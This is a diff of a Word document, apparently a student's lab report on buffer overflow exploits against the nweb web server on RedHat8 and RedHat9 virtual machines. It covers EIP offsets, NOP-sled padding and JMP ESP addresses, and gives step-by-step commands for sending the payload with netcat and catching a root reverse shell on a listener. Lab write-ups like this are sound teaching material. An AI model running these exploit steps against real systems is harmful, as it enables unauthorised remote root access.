+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+          <w:b/>
+        </w:rPr>
+        <w:t>RedHat8</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+          <w:b/>
+        </w:rPr>
+        <w:t>:</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:line="360" w:lineRule="auto"/>
+        <w:ind w:left="720"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
           <w:bCs/>
         </w:rPr>
       </w:pPr>
@@ -857,7 +1563,64 @@
           <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
           <w:bCs/>
         </w:rPr>
-        <w:t xml:space="preserve">that the saved EIP starts at a distance of 1032. Now, to figure out the architecture, I filled a string with 1032 “A”s and the last 4 bytes with “BCDE”. Upon inspecting the core dump file, the saved EIP was overflowed with “0x45444342”. This step helps us understand that we are working with a Little Endian Architecture and that we have control over what can be written over the EIP. The next part was </w:t>
+        <w:t xml:space="preserve">that the saved EIP starts at a distance of 1032. Now, to figure out the architecture, I filled a string with 1032 “A”s and the last 4 bytes with “BCDE”. Upon inspecting the core dump file, the saved EIP was overflowed with “0x45444342”. This step helps us understand that we are working with a Little Endian Architecture and that we have control over what can be written over the EIP. The next part was to figure out what can be a suitable address to overwrite our EIP to and fill those addresses with our shell code. To figure out a suitable memory location we </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t xml:space="preserve">use the command “x/64 $esp-0x__” and then try to work our way upwards to at least 205 bytes, cause that’s how long the shell code is. I worked my way up 0x33F where the memory was filled with As. The memory address I determined to redirect the flow of the code was “0xbffff7c1”. </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:line="360" w:lineRule="auto"/>
+        <w:ind w:left="720"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+          <w:b/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+          <w:b/>
+        </w:rPr>
+        <w:t>RedHat9:</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:line="360" w:lineRule="auto"/>
+        <w:ind w:left="720"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+          <w:bCs/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t xml:space="preserve">Now, since the attack is being conducted on the same program, however, it is running a newer operating system with stack randomization, the only parameter that changes for us, is to figure out what addresses we could fill up and what addresses we could reach. Now, since the ESP is basically different </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>everytime</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t xml:space="preserve">, we could either brute force for ages or use something called a JMP </w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -865,14 +1628,14 @@
           <w:bCs/>
         </w:rPr>
         <w:lastRenderedPageBreak/>
-        <w:t xml:space="preserve">to figure out what can be a suitable address to overwrite our EIP to and fill those addresses with our shell code. To figure out a suitable memory location we </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
-          <w:bCs/>
-        </w:rPr>
-        <w:t xml:space="preserve">use the command “x/64 $esp-0x__” and then try to work our way upwards to at least 205 bytes, cause that’s how long the shell code is. I worked my way up 0x33F where the memory was filled with As. The memory address I determined to redirect the flow of the code was “0xbffff7c1”. </w:t>
+        <w:t>ESP instruction. Essentially, a JMP ESP instruction is an instruction which tells the operating system to go to wherever the ESP is located. Now, it does not matter if we know where the ESP is, the operating system will literally hold our hand and take us to where ESP is hiding. There are multiple tools that can help us locate where the ESP, one of which I came across in my research is called Mona. However, we were given a program that searches where a JMP ESP is located. Now, once you figure out the address where the JMP ESP is located</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t xml:space="preserve">, you basically know what you will be filling up in your EIP. </w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -898,6 +1661,23 @@
         <w:ind w:left="720"/>
         <w:rPr>
           <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+          <w:b/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+          <w:b/>
+        </w:rPr>
+        <w:t>RedHat8:</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:line="360" w:lineRule="auto"/>
+        <w:ind w:left="720"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
           <w:bCs/>
         </w:rPr>
       </w:pPr>
@@ -923,14 +1703,56 @@
           <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
           <w:bCs/>
         </w:rPr>
-        <w:t xml:space="preserve">After figuring out the memory address, where it would be suitable and could fit the entirety of the exploit, you try to reach that address by trying to fill it with characters you can recognize. The input that I sent over after knowing the above information was to create a pattern where I send 827 As, these would represent the NOP sleds, then 205 Fs which would represent the shell code and then 4 Bs, which would be the address to where the redirection of the program would go. Now, in practice those parameters should have worked however, during testing I figured out that it is easier to create a padding before the shell program and after the shell program. Now this process </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
-          <w:bCs/>
-        </w:rPr>
-        <w:t xml:space="preserve">took sometime as when you filled up with the stack with characters, the </w:t>
+        <w:t xml:space="preserve">After figuring out the memory address, where it would be suitable and could fit the entirety of the exploit, you try to reach that address by trying to fill it with characters you can recognize. The input that I sent over after knowing the above information was to create a pattern where I send 827 As, these would represent the NOP sleds, then 205 Fs which would represent the shell code and then 4 Bs, which would be the address to where the redirection of the program would go. Now, in practice those parameters should have worked however, during testing I figured out that it is easier to create a </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>pad</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t xml:space="preserve"> before the shell program and after the shell program. Now this process </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t xml:space="preserve">took </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>some time</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t xml:space="preserve"> as when you filled </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>up</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t xml:space="preserve"> the stack with characters, the </w:t>
       </w:r>
       <w:proofErr w:type="spellStart"/>
       <w:r>
@@ -946,7 +1768,63 @@
           <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
           <w:bCs/>
         </w:rPr>
-        <w:t xml:space="preserve"> wouldn’t change. However, when you replace characters with shell code and NOP sleds, you understand if your code runs or not. Essentially, there should be a better way to figure out how to create a perfect padding however, I did it using a trial and error method of wrapping my shell code with a padding of NOP sleds. The formula that essentially worked for me was putting close to enough padding of NOP sleds in the front that it reaches the redirection address, then putting the shell code and then putting padding of NOP sleds till you reach the start of the EIP at which point you put the address in reverse order(cause Little Endian). After you figure out your padding, it took me close to a weekend to realize that when you send your exploit, if a program just receives NOP sleds, it will corrupt your input, or at least that is what happened in my case. The structure for my exploit which </w:t>
+        <w:t xml:space="preserve"> wouldn’t change. However, when you replace characters with shell code and NOP sleds, you understand if your code runs or not. Essentially, there should be a better way to figure out how to create a perfect padding</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>. However</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t xml:space="preserve">, I did it using a </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>trial-and-error</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t xml:space="preserve"> method of wrapping my shell code with a padding of NOP sleds. The formula that essentially worked for me was putting close to enough padding of NOP sleds in the front that it reaches the redirection address, then putting the shell code and then putting padding of NOP sleds till you reach the start of the EIP at which point you put the address in reverse </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>order (</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t xml:space="preserve">cause Little Endian). </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>I</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t xml:space="preserve">t took me close to a weekend to realize that when you send your exploit, if a program just receives NOP sleds, it will corrupt your input, or at least that is what happened in my case. The structure for my exploit which </w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -1025,6 +1903,7 @@
           <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
           <w:bCs/>
         </w:rPr>
+        <w:lastRenderedPageBreak/>
         <w:t>send_string</w:t>
       </w:r>
       <w:proofErr w:type="spellEnd"/>
@@ -1033,15 +1912,79 @@
           <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
           <w:bCs/>
         </w:rPr>
-        <w:t xml:space="preserve"> you have to subtract that many bytes from your padding. Try to remove it from the padding after the shell code so that you do not have to figure </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
-          <w:bCs/>
-        </w:rPr>
-        <w:lastRenderedPageBreak/>
-        <w:t xml:space="preserve">out a new starting NOP padding for your exploit. Now, after similar to the way you were testing while understanding the padding needed, you test to see if your exploit works. </w:t>
+        <w:t xml:space="preserve"> you have to subtract that many bytes from your padding. Try to remove it from the padding after the shell code so that you do not have to figure out a new starting NOP padding for your exploit. Now, after similar to the way you were testing while understanding the padding needed, you test to see if your exploit works. </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>Now, since the shell will be returned back to some listening port, you have to listen on that port for that returned shell.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:line="360" w:lineRule="auto"/>
+        <w:ind w:left="720"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+          <w:bCs/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:line="360" w:lineRule="auto"/>
+        <w:ind w:left="720"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+          <w:b/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+          <w:b/>
+        </w:rPr>
+        <w:t>RedHat9:</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:line="360" w:lineRule="auto"/>
+        <w:ind w:left="720"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+          <w:bCs/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>Now, since we are technically attacking the same program, however, on a newer version of the operating system that has stack address randomization</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>, most of the things we did are going to be the same as they were for the RedHat8 system. First, similar to the way we figured out that we can control the EIP we check if the EIP is in the same place. Now, since the EIP is still 1032 bytes away, we just have to figure out what address should be put in the EIP. Now, since we learnt about JMP ESP in the earlier part of this report, lets run the program provided to us, or use Mona, to figure out where the JMP ESP. Now, it is important to know that the JMP ESP instruction is located in a place where the progra</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t xml:space="preserve">m has shared files. After running, the program we are outputted with all the addresses where we can find the JMP ESP instruction. The instruction, I chose to go with was 0x421276c7. Now, once the EIP is loaded with this address, we go to look if we are jumping to the ESP. Upon comparing, it seems that we do go inside the ESP however, we do not go to the start of the ESP. Now, to tackle this, we have to figure out a way to fill up the stack in such a way that we reach the shell code. This is not a problem as we learned that there is nothing a little padding cannot fix. Now, in this stage I did come up with an issue. Essentially, you could overflow the program so much that the Operating System takes over tells you that program does not take such inputs. So, we figure out how much padding we can put before we essentially run into a similar issue. Through, trial and error, I figured out that after about using 3000 units of NOP sleds your shell code will eventually be reached, and then I added about 30 units of NOP sleds just to be safe. Now, the general pattern that can be followed for similar operating systems, is that first we </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t xml:space="preserve">add enough input to control our EIP, this could be filled up with whatever character, then we have 4 bytes of the address where the JMP ESP instruction exists and then we fill up the code with some padding and shell code and then again some more padding. </w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -1097,6 +2040,7 @@
           <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
           <w:b/>
         </w:rPr>
+        <w:lastRenderedPageBreak/>
         <w:tab/>
       </w:r>
       <w:hyperlink r:id="rId5">

</xml_diff>

<commit_message>
added pdf of completed report
</commit_message>
<xml_diff>
--- a/BufferOverflowAttacks/Programming Assignment 1 Report.docx
+++ b/BufferOverflowAttacks/Programming Assignment 1 Report.docx
@@ -215,6 +215,49 @@
         <w:rPr>
           <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
           <w:bCs/>
+          <w:color w:val="FF0000"/>
+        </w:rPr>
+        <w:t xml:space="preserve">Assuming that the virtual boxes are powered up and are running </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+          <w:bCs/>
+          <w:color w:val="FF0000"/>
+        </w:rPr>
+        <w:t>nweb</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+          <w:bCs/>
+          <w:color w:val="FF0000"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> on port 8888</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>:</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:line="360" w:lineRule="auto"/>
+        <w:ind w:left="720"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+          <w:bCs/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+          <w:bCs/>
         </w:rPr>
         <w:t xml:space="preserve">Regardless of which exploit is to be run: </w:t>
       </w:r>
@@ -259,9 +302,789 @@
         <w:ind w:left="720"/>
         <w:rPr>
           <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
-          <w:bCs/>
-        </w:rPr>
-      </w:pPr>
+          <w:b/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+          <w:b/>
+        </w:rPr>
+        <w:t>Redhat8:</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:line="360" w:lineRule="auto"/>
+        <w:ind w:left="720"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+          <w:bCs/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+          <w:b/>
+        </w:rPr>
+        <w:t xml:space="preserve">Step 1: </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t xml:space="preserve">Open a terminal and type “ls” to check </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>if the exploit file exists in the directory. (</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>FileName</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>: RedHat8BOE.py)</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:line="360" w:lineRule="auto"/>
+        <w:ind w:left="720"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+          <w:bCs/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+          <w:b/>
+        </w:rPr>
+        <w:t>Step 2:</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t xml:space="preserve"> If the file exists in the directory, run the command “EGG=$(python3 RedHat8BOE.py)”</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:line="360" w:lineRule="auto"/>
+        <w:ind w:left="720"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+          <w:bCs/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+          <w:b/>
+        </w:rPr>
+        <w:t>Step 3:</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t xml:space="preserve"> If that command successfully executes, open another </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>terminal</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t xml:space="preserve"> and type the command “</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>nc</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t xml:space="preserve"> -</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>nvlp</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t xml:space="preserve"> 8998”.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:line="360" w:lineRule="auto"/>
+        <w:ind w:left="720"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+          <w:bCs/>
+          <w:color w:val="FF0000"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+          <w:b/>
+        </w:rPr>
+        <w:t>Step 4:</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t xml:space="preserve"> If in the second terminal, the command returns “listening on [any] 8998 …”, then run the command “echo GET /$EGG HTTP/1.0|nc 192.168.32.</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t xml:space="preserve">40 8888” </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+          <w:bCs/>
+          <w:color w:val="FF0000"/>
+        </w:rPr>
+        <w:t>on the first terminal</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+          <w:bCs/>
+          <w:color w:val="FF0000"/>
+        </w:rPr>
+        <w:t xml:space="preserve">. </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:line="360" w:lineRule="auto"/>
+        <w:ind w:left="720"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+          <w:bCs/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+          <w:b/>
+        </w:rPr>
+        <w:t xml:space="preserve">Step 5: </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>The second terminal should receive something like: “</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>connect to [192.168.32.10] from (UNKNOWN) [192.168.32.40] 32770</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>” at which point you could type “</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>whoami</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t xml:space="preserve">” to check if you are root. </w:t>
